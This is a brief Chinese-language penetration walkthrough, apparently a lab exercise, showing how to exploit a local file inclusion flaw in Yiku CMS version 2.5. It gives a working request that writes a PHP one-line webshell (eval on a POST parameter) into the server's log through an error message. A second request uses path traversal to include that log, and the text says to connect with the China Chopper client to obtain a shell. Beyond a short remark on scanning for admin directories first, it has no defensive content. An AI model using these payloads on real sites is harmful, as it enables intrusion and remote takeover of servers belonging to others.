易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。
渗透之前的操作,比如先用后台扫描工具,扫描得到该网站的后台目录结构,才更好的进行后面的操作。
我们通过访问该url,将一句话木马写入日志文件中
http://192.168.10.22/index.php?s=my/show/id/{~eval($_POST[x])}
该日志是以时间日期命名的,用菜刀连接该日志文件,得到shell
http://192.168.10.22/index.php?s=my/show/id/\..\temp\logs\18_11_28.log
相关文章:文件包含漏洞